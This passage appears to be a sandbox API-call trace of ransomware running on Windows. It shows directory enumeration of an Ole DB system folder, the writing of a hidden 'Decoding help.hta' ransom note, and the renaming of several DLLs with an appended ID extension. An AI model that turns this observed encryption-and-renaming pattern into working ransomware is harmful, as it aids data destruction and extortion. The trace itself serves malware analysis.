ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 0 [0044.310] FindClose (in: hFindFile=0x5da638 | out: hFindFile=0x5da638) returned 1 Thread: id = 436 os_tid = 0xbd8 [0044.241] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*", lpFindFileData=0x1c81fd30 | out: lpFindFileData=0x1c81fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f324e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f324e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da638 [0044.327] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.327] FindNextFileW (in: hFindFile=0x5da638, lpFindFileData=0x1c81fd30 | out: lpFindFileData=0x1c81fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f324e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f324e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.327] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0044.327] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.327] FindNextFileW (in: hFindFile=0x5da638, lpFindFileData=0x1c81fd30 | out: lpFindFileData=0x1c81fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0044.327] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0044.327] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0044.327] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0044.330] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" [0044.330] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned 51 [0044.330] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US" [0044.330] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*.*" [0044.330] GlobalMemoryStatus (in: lpBuffer=0x1c81fd10 | out: lpBuffer=0x1c81fd10) [0044.330] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x116e1ae0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x450 [0044.361] CloseHandle (hObject=0x450) returned 1 [0044.361] FindNextFileW (in: hFindFile=0x5da638, lpFindFileData=0x1c81fd30 | out: lpFindFileData=0x1c81fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ad34e79, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9ad34e79, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9ad5afda, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1f000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdaosp.dll", cAlternateFileName="")) returned 1 [0044.361] lstrcpyW (in: lpString1=0x5fb50f8, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" [0044.361] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned 51 [0044.361] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta" [0044.362] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\ole db\\decoding help.hta")) returned 0xffffffff [0044.362] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\ole db\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0044.408] WriteFile (in: hFile=0x414, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1c81fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1c81fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0044.409] CloseHandle (hObject=0x414) returned 1 [0044.410] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0044.410] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msdaosp.dll") returned -1 [0044.410] lstrlenW (lpString="msdaosp.dll") returned 11 [0044.410] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" [0044.410] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned 51 [0044.410] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\", lpString2="msdaosp.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll" [0044.410] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll" [0044.410] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0044.410] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdaosp.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\ole db\\msdaosp.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.434] FindNextFileW (in: hFindFile=0x5da638, lpFindFileData=0x1c81fd30 | out: lpFindFileData=0x1c81fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14cd0c35, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0x14cd0c35, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x349a6d70, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x6a000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdaps.dll", cAlternateFileName="")) returned 1 [0044.434] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" [0044.434] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned 51 [0044.434] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta" [0044.434] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\ole db\\decoding help.hta")) returned 0x1 [0044.434] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msdaps.dll") returned -1 [0044.434] lstrlenW (lpString="msdaps.dll") returned 10 [0044.434] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" [0044.434] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned 51 [0044.434] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\", lpString2="msdaps.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll" [0044.434] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll" [0044.434] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0044.434] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdaps.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\ole db\\msdaps.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.500] FindNextFileW (in: hFindFile=0x5da638, lpFindFileData=0x1c81fd30 | out: lpFindFileData=0x1c81fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86c0138a, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x86c0138a, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x86c0138a, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xb6000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdasql.dll", cAlternateFileName="")) returned 1 [0044.500] lstrcpyW (in: lpString1=0x110a78d0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" [0044.500] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned 51 [0044.500] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta" [0044.500] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\ole db\\decoding help.hta")) returned 0x1 [0044.500] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msdasql.dll") returned -1 [0044.500] lstrlenW (lpString="msdasql.dll") returned 11 [0044.500] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" [0044.500] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned 51 [0044.500] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\", lpString2="msdasql.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdasql.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdasql.dll" [0044.500] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdasql.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdasql.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdasql.dll" [0044.500] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdasql.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdasql.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdasql.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0044.500] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdasql.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdasql.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdasql.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\ole db\\msdasql.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.501] FindNextFileW (in: hFindFile=0x5da638, lpFindFileData=0x1c81fd30 | out: lpFindFileData=0x1c81fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ab69cf, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0x2ab69cf, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x838ac7b0, ftLastWriteTime.dwHighDateTime=0x1ca0422, nFileSizeHigh=0x0, nFileSizeLow=0xf000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdasqlr.dll", cAlternateFileName="")) returned 1 [0044.501] lstrcpyW (in: lpString1=0x110a78d0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" [0044.501] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned 51 [0044.501] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta" [0044.501] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\ole db\\decoding help.hta")) returned 0x1 [0044.501] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msdasqlr.dll") returned -1 [0044.501] lstrlenW (lpString="msdasqlr.dll") returned 12 [0044.501] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" [0044.501] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned 51 [0044.501] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\", lpString2="msdasqlr.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdasqlr.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdasqlr.dll" [0044.501] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdasqlr.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdasqlr.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdasqlr.dll" [0044.501] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdasqlr.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdasqlr.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdasqlr.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0044.501] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdasqlr.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdasqlr.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdasqlr.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\ole db\\msdasqlr.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.501] FindNextFileW (in: hFindFile=0x5da638, lpFindFileData=0x1c81fd30 | out: lpFindFileData=0x1c81fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc3c3a6b, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0xfc3c3a6b, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x349f2860, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x20000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdatl3.dll", cAlternateFileName="")) returned 1 [0044.501] lstrcpyW (in: lpString1=0x110a78d0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" [0044.501] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned 51 [0044.502] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta" [0044.502] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\ole db\\decoding help.hta")) returned 0x1 [0044.502] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msdatl3.dll") returned -1 [0044.502] lstrlenW (lpString="msdatl3.dll") returned 11 [0044.502] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" [0044.502] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned 51 [0044.502] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\", lpString2="msdatl3.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdatl3.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdatl3.dll" [0044.502] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdatl3.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdatl3.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdatl3.dll" [0044.502] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdatl3.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdatl3.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdatl3.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0044.502] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdatl3.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdatl3.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdatl3.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\ole db\\msdatl3.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.502] FindNextFileW (in: hFindFile=0x5da638, lpFindFileData=0x1c81fd30 | out: lpFindFileData=0x1c81fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d2cdc0, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0x1d2cdc0, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x383128c0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x9000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msxactps.dll", cAlternateFileName="")) returned 1 [0044.502] lstrcpyW (in: lpString1=0x110a78d0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" [0044.502] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned 51 [0044.502] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta" [0044.502] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\ole db\\decoding help.hta")) returned 0x1 [0044.502] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msxactps.dll") returned -1 [0044.502] lstrlenW (lpString="msxactps.dll") returned 12 [0044.502] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" [0044.503] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned 51 [0044.503] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\", lpString2="msxactps.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msxactps.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msxactps.dll" [0044.503] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msxactps.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msxactps.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msxactps.dll" [0044.503] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msxactps.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msxactps.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msxactps.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0044.503] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msxactps.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msxactps.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msxactps.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\ole db\\msxactps.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.503] FindNextFileW (in: hFindFile=0x5da638, lpFindFileData=0x1c81fd30 | out: lpFindFileData=0x1c81fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84c2ad0f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x84c2ad0f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x84c50e6f, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x10d000, dwReserved0=0x0, dwReserved1=0x0, cFileName="oledb32.dll", cAlternateFileName="")) returned 1 [0044.503] lstrcpyW (in: lpString1=0x110a78d0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" [0044.503] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned 51 [0044.503] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta" [0044.503] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\ole db\\decoding help.hta")) returned 0x1 [0044.503] lstrcmpiW (lpString1="Decoding help.hta", lpString2="oledb32.dll") returned -1 [0044.503] lstrlenW (lpString="oledb32.dll") returned 11 [0044.503] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" [0044.503] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned 51 [0044.503] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\", lpString2="oledb32.dll" | out: 